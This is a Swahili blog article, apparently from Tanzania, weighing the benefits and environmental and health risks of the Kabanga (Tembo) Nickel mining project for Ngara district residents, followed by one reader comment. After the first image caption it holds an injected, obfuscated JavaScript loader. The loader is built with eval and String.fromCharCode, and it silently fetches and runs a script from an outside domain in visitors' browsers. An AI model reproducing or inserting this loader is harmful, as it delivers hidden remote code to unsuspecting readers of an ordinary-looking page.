Recent Comments

Kabanga Nickel ni Neema au Laana kwa Wananchi wa Ngara?

By Baraka Bitariho Feb 15, 2023
<p>Kielelezo ama mchoro unaoonyesha mfumo mzima wa Hydrometallurgy </p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Kielelezo ama mchoro unaoonyesha mfumo mzima wa Hydrometallurgy
Mradi wa Kabanga Nickel ambao sasa unaitwa Tembo Nickel ulianzishwa rasmi mwaka 2007 na hadi leo umeleta ajira zaidi ya elfu na mia mbili. Huu mradi utagharimu billion 1.3 dollar za Kimarekani, ambapo million $950 zitatumika kwenye kuendesha kiwanda na million $350 zitatukika kujenga mfumo wa kutumia maji kwenye mzunguko mzima wa kusafisha madini. Mradi unakadiriwa kuendeshwa kwa miaka 33.
Mradi huu unamilikiwa na Barrick Gold,  Xstrata Nickel na serikali ya Tanzania. Inakadiliwa zaidi ya tani milioni 60 za madini aina ya Nickel kuchimbwa Kabanga. Hapo baadae kiwanda cha kutengeneza beteri kitaanzishwa kutokana na utajiri wa madini yaliyopo Ngara.
Wilaya ya Ngara inasadikika kuwa na utajiri wa madini mbali mbali yakiwemo bati, almasi, nickel, na kadharika. Wilaya ya Ngara pia ina mabonde na mito ya kutosha na ni wilaya iliyobahatika kuwa na misimu minne ya hali ya hewa. Ngara inapata mvua mara mbili kwa mwezi na ni wilaya yenye upepo wa kutosha ambapo pengine unaweza kuvunwa na kutumika katika kuzalisha umeme.
Zaidi ya billion 1 za kimarekani kuwekeza Kabanga, Kagera, Tanzania na kuleta kazi tele maoni Kagera. Ila mpango wa kuweka kiwanda cha kutengeneza beteri bado unapikwa.
Uwepo wa madini na hali nzuri ya hewa inaweza kuwa neema ama laana kwa Ngara na maeneo jirani. Uzuri na utajiri wa madini unaweza kuwa kivutio kwa wageni; hasa wageni wanaokuja kwa kivuri cha uwekezaji.
Utajiri wa Ngara utawanufaisha wageni kama usomi na njia bora za kisayansi zinazozingatia utunzaji wa mazingira hazitotumika. Katika uvunaji wa madini yaliyopo Wilayani Ngara, njia zozote zitakazo tumika, ziache mazingira salama ili maisha na uhai wa wakazi wa Ngara yasiathiriwe kutokana na matumizi ya kemikali nyingi na process ambazo zinalazimu viwanda kuvujisha maji machafu ardhini.
Ngara inajivunia kutosumbuliwa na ukame wa aina yoyote kwani maji sio haba wilayani humo.
Tafiti zilizofanywa na gazeti la simamia zinaonyesha kiwanda cha Kabanga Nickel zitatumia mfumo wa hydrometullurgical process. Huu mfumo utazalisha Nickel ambayo itaacha mazingira safi na ambayo itakua kiungo muhimu kwenye magari ya kisasa. Vile vile, kupitia Life zone Technology uchimbaji na uzoefu mkubwa utafundishwa pale kiwandani ili kuongeza uelewa na kukomaza uzalishaji wa madini unaotumia mfumo wa Hydrometullurgy kwa Afrika Mashariki na Kati.
Huu ni mfumo unaotumia maji mengi katika uchimbaji wa madini. Endapo maji yanayotumika katika uchimbaji hayatokusanywa na kusafishwa na kurudishwa kwenye mzungunguko wa uchimbaji, basi maisha ya wakazi wa Ngara yatakua hatarini. Hata hivyo mabaki yanayotokana na uvunaji na usafishaji wa madini ni sumu kali kwa chembe chembe kadhaa hupenda kwenye hewa. Hewa chafu inaweza kupenyeza kwenye mwili wa binadamu hata bila uhitaji wa kugusa  wala kuwa karibu na panapochimbea madini.
Maji machafu yataharibu vyanzo vya maji vya wana Ngara. Kutokana na tafiti za kisayansi, maisha ya wakazi wa maeneo ya machimbo ya madini hufupishwa kutokana na uchafuzi wa maji na mazingira kwa ujumla.
Madini huwa yana kemikali hatari kwa mwili wa binadamu. Hizi kemikali huhitaji uangalizi na matumizi ya sayansi ya juu kuhakikisha hayadhuru maisha ya binadamu, awe mfanyakazi ama mkazi wa eneo husika.
Ni kawaida kuona wakazi wa maeneo ambayo yapo karibu na machimbo ya madini kupoteza meno, viungo/mifupa hafifu, upofu, watu kupata ukiziwi, hitilafu kwenye mifumo ya uzazi ama kuzaa watotowaliokufa, ama hata ngozi isiyokuwa na afya njema.
Hizi ni baadhi ya athari zinazosababishwa na matumizi ya maji yaliyochafutliwa na kemikali za machimboni, ama kutumia vyakula vilivyostawi kwenye mazingira yenye machimbo.
Utafiti uliofanyika katika kijiji cha Norilski, nchini urusi, wakazi wa maeneo ya machimbo walikua wanafariki kwa kasi hasa wakikaribia umri wa miaka 50 na zaidi ya asilimia 20 ya mimba zilihalibika. Na madhara yaliyokithiri ya kiafya, akili, na uharibifu wa mimba ulipelekea wakazi wa maeneo ya machimbo ya madini yalipelekea  wakazi wa The Grassy Narrows First Nation community huko nchini Canada, kushitaki kampuni zilizokuwa zinajishughulisha na maswala ya uchimbaji wa madini. Idadi kubwa ya watu kutoka kabila la First Nation la nchini Cananda waliathirika sana kiafya gas aina ya Mercury,  HG, ilipovujia kwenye mito na mabwawa ya maji.
Kwa Ngara, tuhimize viongozi wetu na viongozi wa kampuni za madini kutumia njia ambazo si hatarishi kwa wana Ngara. Itakua vyema kuhimiza kampuni zinazochimba madini zionyeshe kwa michoro ya ramani jinsi gesi na maji chafu yanavyotunzwa hasa wakati na baada ya shughuli zao. Ni muhimu pia jamii kujulishwa mabaki ya aina yoyote zinazotumika jinsi yatakavyokusanywa na kusafishwa ili hata yakirudi ardhini yasizuri mazingira na wakazi wa eneo husika. Nchi nyingi hulazimu makampuni kubandika hadharani maelezo na michoro yote inayoonyesha aina ya kemikali na mifumo mbali mbali ambayo inaweza kuwa hatarishi kwa binadamu. Tutategemea makampuni yanayoendelea kuaminika kanda ya ziwa kwa ajiri ya shughuli za madini kuelimisha jamii hasa juu ya mkakati itakayotumika kuhakikisha shughuli zao hazitobaka uasili wa mazingira na uhai wa wakazi wa eneo husika.

One thought on “Kabanga Nickel ni Neema au Laana kwa Wananchi wa Ngara?”
  1. Sasa hizo ndizo habari nzuri zinazotufumbua macho wana Ngara

    Nakupongeza ndugu Mwandishi.

Comments are closed.